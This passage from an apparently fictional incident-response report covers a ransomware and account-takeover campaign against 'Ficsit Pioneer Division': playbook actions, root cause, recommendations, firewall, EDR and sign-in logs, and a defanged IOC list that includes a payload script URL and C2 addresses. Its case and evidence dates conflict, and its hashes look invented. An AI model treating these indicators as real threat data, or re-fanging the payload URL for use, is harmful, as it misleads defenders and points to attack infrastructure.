Three SOAR playbooks executed automatically in response to this incident, orchestrating rapid containment actions across multiple security controls within seconds of detection — significantly faster than manual response would have permitted.

PB-001 — AiTM Phishing Response

Triggered at 10:09 UTC by ALT-7272 (AiTM Session Hijack). Executed 14 steps: revoked all active sessions for pioneer, blocked phishing domain pioneer-updates.svc.net at NGFW, quarantined THREAT-001 from email gateway, elevated account risk score, notified SOC, filed SIEM alert, initiated identity risk investigation, and forced MFA re-enrollment. Completion time: approximately 45 seconds from trigger to final action.

PB-002 — MFA Fatigue Lockdown

Triggered at 14:10 UTC by ALT-7285 (MFA Failure Threshold breach on m.blake). Queued session monitoring; on ALT-7288 confirmation of successful compromise, executed 10 steps: suspended m.blake account, revoked all sessions, enabled step-up authentication for all Admin Portal access, reset all API tokens, flagged for investigation, and notified security team. Completion time: approximately 30 seconds from compromise confirmation.

PB-003 — Ransomware Containment

Triggered at 14:35 UTC by SIEM investigation auto-creation (correlated ALT-7291 + ALT-7287 + ALT-7278). Executed 12 steps: isolated RESEARCH-STATION-01 from network fabric, pushed C2 IP block to NGFW, sinkholed C2 domains at DNS, quarantined ransomware binary, preserved EDR telemetry and memory dumps, initiated forensic imaging workflow, notified IR team and legal, pushed all IOCs to threat intelligence platform, opened SOAR case CASE-2024-0267, and created post-incident review ticket in Queue (IR-002). Completion time: approximately 90 seconds from trigger.

Effective Automation
The combination of PB-001, PB-002, and PB-003 executed critical containment steps — network isolation, session revocation, IOC distribution — within 2 minutes of each trigger event. Without SOAR automation, these steps would have required 20–40 minutes of manual execution, potentially allowing further lateral movement or additional exfiltration.
Section 11
Related Incidents

The following investigations are directly linked to or correlated with INV-2024-0087 as part of the broader IRON CHIMNEY campaign against Ficsit Pioneer Division.

IDTitleRelationshipStatus
INV-2024-0086 Suspected Account Takeover — m.blake (Executive) Part of same IRON CHIMNEY campaign. IP 203.0.113.88 shares ASN with C2 185.220.101.47. m.blake session used for reconnaissance that informed IRONLOCK targeting. Active
INV-2024-0081 Suspicious Login — pioneer (After Hours, External IP) 01:44 UTC after-hours session on pioneer account from VPN IP 92.118.37.91. Two R&D files accessed. May represent early attacker reconnaissance using previously obtained credentials, 8+ hours before main attack. Investigating
INV-2024-0079 Sensitive Data Staging — R&D Shared Drive 3.2 GB of R&D files bulk-staged under pioneer account. Occurred while pioneer account was under review. High probability this was attacker-controlled activity under the compromised session. Possible pre-exfil staging for the 547 MB transfer at 14:28 UTC. Investigating
INV-2024-0080 Phishing Campaign — Engineering Division Separate phishing campaign targeting 14 Engineering employees same day. Possible IRON CHIMNEY diversionary tactic or concurrent unrelated attack. Shares timing correlation but different infrastructure. Investigating
Section 12
Root Cause Analysis
Primary Root Cause

The primary root cause was the successful delivery and execution of a macro-enabled Excel file (THREAT-001) by the pioneer account, combined with the absence of a Real-Time Outbound Blocking policy for confirmed C2 IPs identified by the IDS signature engine. The AiTM bypass of MFA is a technique that standard MFA cannot prevent — it requires phishing-resistant authentication (FIDO2/hardware keys) to mitigate.

Contributing Factors
C1
Macro Execution Permitted
Pioneer was able to enable and execute macros in a downloaded Excel file. Macro execution should be disabled by Group Policy for all users who do not have a documented business need for macros. An approved document exception process was not in place.
Critical
C2
Firewall Block Pending Manual Confirmation
The firewall alerted on 547 MB outbound to a known C2 IP but required manual rule confirmation before blocking. By the time SOAR PB-003 pushed the block rule, exfiltration had already completed. Outbound traffic to IDS-flagged C2 signatures should be automatically blocked.
Critical
C3
Standard TOTP/Push MFA Susceptible to AiTM and Fatigue
Both pioneer (AiTM session token theft) and m.blake (push fatigue) accounts were compromised despite MFA being enabled. Push-based MFA and TOTP cannot prevent AiTM attacks; FIDO2 / passkey-based authentication is required for phishing-resistant MFA.
High
C4
Admin Portal Accessible from External Networks
The Ficsit Admin Portal was accessible from external IPs without network-based access controls. The m.blake session was established directly from 203.0.113.88 (external/untrusted). Admin Portal access should require corporate VPN or a dedicated privileged access workstation.
High
C5
Outbound Rclone Not Detected or Blocked
Rclone (a legitimate cloud sync utility) was used for data exfiltration. Rclone is not standard Ficsit software and its execution should have been flagged by application allowlisting or DLP policies. Monitoring for unusual large outbound transfers should trigger immediate automated blocking.
High
C6
INV-2024-0081 Alert Not Escalated Promptly
The after-hours unauthorized login to the pioneer account at 01:44 UTC (INV-2024-0081) was not escalated or investigated prior to the main attack at 10:09 UTC. If this event had been acted upon — credentials rotated, session terminated — the attacker may have lost their initial foothold. After-hours logins from external/VPN IPs should trigger immediate analyst review with a 1-hour SLA.
High
Section 13
Recommendations
Immediate (0–72 hours)
R1
Complete Forensic Imaging of RESEARCH-STATION-01 and PIONEER-WS-01
Preserve all forensic evidence before any remediation. Full disk image, memory dump, and log collection. Chain of custody documentation required for potential legal proceedings.
Immediate
R2
Disable Office Macro Execution via Group Policy
Apply GPO to disable VBA macros in all Office applications for all endpoints where macros are not a documented business requirement. This single control would have prevented execution of the primary delivery mechanism.
Immediate
R3
Enable Automated Blocking for IDS C2 Signature Matches
Configure the NGFW to automatically block outbound traffic to IPs matching confirmed C2 signatures (priority 1 IDS alerts) without requiring manual confirmation. This should have blocked or significantly limited the exfiltration.
Immediate
R4
Assess All R&D Staff Credentials for Compromise
Given the after-hours access (INV-2024-0081) and AiTM success, assume all R&D staff credentials may have been harvested. Force password resets and MFA re-enrollment across the R&D division. Review for any additional compromised accounts.
Immediate
Short-Term (1–4 weeks)
R5
Deploy Phishing-Resistant MFA (FIDO2 / Passkeys)
Replace push-notification MFA with hardware security keys or passkeys for all privileged accounts (admin portal access, executive accounts, and R&D personnel). Push MFA is fundamentally vulnerable to both AiTM and fatigue attacks. Priority: executive accounts first, then privileged technical accounts.
High
R6
Restrict Admin Portal to Corporate VPN / PAW
Configure network-level access controls so the Ficsit Admin Portal is inaccessible from external IPs without first connecting via corporate VPN from a registered device. Privileged Access Workstations (PAWs) should be required for admin portal access by any privileged account.
High
R7
Implement Application Allowlisting on R&D Endpoints
Deploy application allowlisting (Windows Defender Application Control or equivalent) on all R&D workstations. pioneer_research_tool.exe was an unsigned binary not in the software inventory — application allowlisting would have prevented its execution entirely.
High
R8
Block Rclone and Unauthorized Cloud Sync Tools
Add Rclone binary signatures and known Rclone traffic patterns to DLP and NGFW block lists. Deploy endpoint application control to prevent execution of unauthorized file sync utilities. Rclone is consistently used by ransomware actors as an exfiltration tool.
High
R9
Tighten After-Hours Alert SLA to 1 Hour
INV-2024-0081 (after-hours login) was created at 01:44 UTC but not investigated until 08:05 UTC — over 6 hours later. Establish an on-call escalation procedure requiring analyst response to after-hours external logins within 1 hour. This may have enabled earlier credential rotation and prevented the main attack.
High
Strategic (1–6 months)
R10
Implement Immutable Offline Backup for R&D Data
Establish a 3-2-1-1 backup strategy (3 copies, 2 media types, 1 offsite, 1 offline immutable) for all R&D data. VSS deletion is a core ransomware capability — VSS alone is not a sufficient recovery mechanism. Offline backups are immune to in-network ransomware.
Medium
R11
Conduct Tabletop Exercise — Ransomware Scenario
Run a structured tabletop exercise for IR leadership, legal, and executive teams covering ransomware response, ransom payment decision-making, regulatory notification obligations, and public communications. The IRON CHIMNEY incident revealed gaps in the legal notification and executive escalation process.
Medium
R12
Deploy Email Link Detonation and AiTM-Aware Detection
Enable detonation sandbox analysis for all inbound email links. Deploy email gateway rules specifically designed to detect AiTM phishing proxy domains (domain age <7 days + DMARC misalignment + display name impersonation). The combination of these signals in THREAT-001 was detectable but not flagged prior to delivery.
Medium
Appendix A
Key Evidence Logs

Selected log excerpts supporting the incident findings. Full logs preserved in forensic image (chain of custody: IR-EVID-2026-0087-A). Hashes defanged for report distribution.

ALT-7291 — Ransomware File Extension Rename (EDR, RESEARCH-STATION-01)
CRITICAL
2026-05-27T14:31:02Z  RESEARCH-STATION-01  EDR-EVENT  severity=CRITICAL
  rule="Ransomware::FileExtMassRename"  process=pioneer_research_tool.exe
  pid=4892  user=FICSIT\pioneer  signed=false  cert_issuer=NONE
  hash_sha256=a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7
  file_op=RENAME  count=847  window_sec=238
  sample_renames:
    C:\Users\pioneer\Research\MAM-Notes-v4.docx → MAM-Notes-v4.docx.encrypted
    C:\Users\pioneer\Research\alien-consciousness-draft.pdf → ...pdf.encrypted
    C:\Users\pioneer\Research\scada-config-export.xlsx → ...xlsx.encrypted
  ransom_note: README_DECRYPT.txt  drop_path=C:\Users\pioneer\Research\
  scheduled_task: \Microsoft\Windows\Update\Updater  [persistence]
ALERT: action=QUARANTINE_PROCESS  result=SUCCESS  process_terminated=true
ALT-7287 — Large Outbound Transfer / Exfiltration (Firewall)
HIGH
May 27 14:28:11 FICSIT-FW-CORE CEF:0|FicsitSec|NGFW|4.2|1201|LargeOutbound|HIGH
  src=10.0.1.42 spt=50122 dst=185.220.101.47 dpt=443 proto=TCP
  bytes_out=573741824 bytes_in=1802 duration_sec=183
  geo_dst="NL/Tor exit node"  asn_dst=AS60068 (CDN77)
  rule_matched="Exfil::LargeOutbound>500MB"

May 27 14:31:18 FICSIT-FW-CORE IDS-ALERT:
  Signature 2025441 "ET TROJAN Ransomware C2 Beacon"
  src=10.0.1.42 dst=185.220.101.47 sid=2025441 priority=1
  action=ALERT  [NOT BLOCKED — manual confirmation pending]
ALT-7272 — AiTM Session Hijack (Foyl MailGuard / Entra ID)
HIGH
2026-05-27T10:09:14Z  Foyl-MailGuard  ATO-DETECT  severity=HIGH
  victim=pioneer@ficsit-pioneer.corp  proxy_ip=185.220.101.47
  phishing_domain=pioneer-updates.svc.net  domain_age=6d
  phishing_email=THREAT-001  attachment=MAM_Update_Q4_2026.xlsm
  session_cookie_stolen=true  mfa_bypassed=true [AiTM token relay]
  entra_ato_case=ATO-001  risk_score=94
  rule="Identity::AiTM_Session_Hijack"  soar_trigger=PB-001
ALT-7288 — m.blake Admin Portal Compromise (Entra ID)
HIGH
{"time":"2026-05-27T14:17:33Z","category":"SignInLogs",
 "userPrincipalName":"m.blake@ficsit-pioneer.corp","ipAddress":"203.0.113.88",
 "appDisplayName":"Ficsit Admin Portal","status":{"errorCode":0},
 "authMethod":"Microsoft Authenticator","succeeded":true,
 "riskDetail":"adminConfirmedSigninCompromised","riskLevelDuringSignin":"high"}

SESSION ACTIVITY (session_id=bae941f2, duration=22min):
  14:17:55  GET /api/v1/inventory/hosts?limit=500   200  (×14)
  14:18:30  GET /api/v1/directory/users?format=full 200  (×6)
  14:20:11  GET /api/v1/network/subnet-map          200  (×1)
ALERT: EntraID::SuccessAfterMFABurst  session_id=bae941f2  api_calls=21
Appendix B
IOC Reference — Machine-Readable Format

All IOCs below are defanged for safe sharing. Remove defanging (replace [.] with . and hxxp with http) before operationalizing.

IOC List — IRON CHIMNEY (TA-001 / Operation SMELTING)
TLP:AMBER
# IP Addresses
185[.]220[.]101[.]47          # C2 / AiTM proxy / exfil destination (Confirmed)
203[.]0[.]113[.]88            # MFA fatigue source (Confirmed)
92[.]118[.]37[.]91            # After-hours VPN login source (Medium)

# Domains
pioneer-updates[.]svc[.]net
update-cdn[.]ficsit-external[.]com
ficsit-account-verify[.]com
d3adbeef123456789[.]update[.]microsoft-cdn-verify[.]net

# URLs
hxxps://pioneer-updates[.]svc[.]net/portal/verify
hxxp://update-cdn[.]ficsit-external[.]com/mam/latest/update.ps1

# File Hashes (SHA256)
a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7  # pioneer_research_tool.exe (IRONLOCK)
b9c2e7f4a1d3e031c8f5a4b7e2d9c1f6a3b8e5d2c7f4a1b0e3d8c5f2a9b6e1  # README_DECRYPT.txt dropper
a3f8c1d2e4b5a9f0c7e3d6b8a1f4c2e5d9b3a7f0c4e8d1b5a2f6c3e7d0b4a8  # MAM_Update_Q4_2026.xlsm

# Email Addresses
updates@pioneer-updates[.]svc[.]net
external@threatactor[.]net

# Scheduled Task
\Microsoft\Windows\Update\Updater  (malicious persistence — not legitimate Windows task)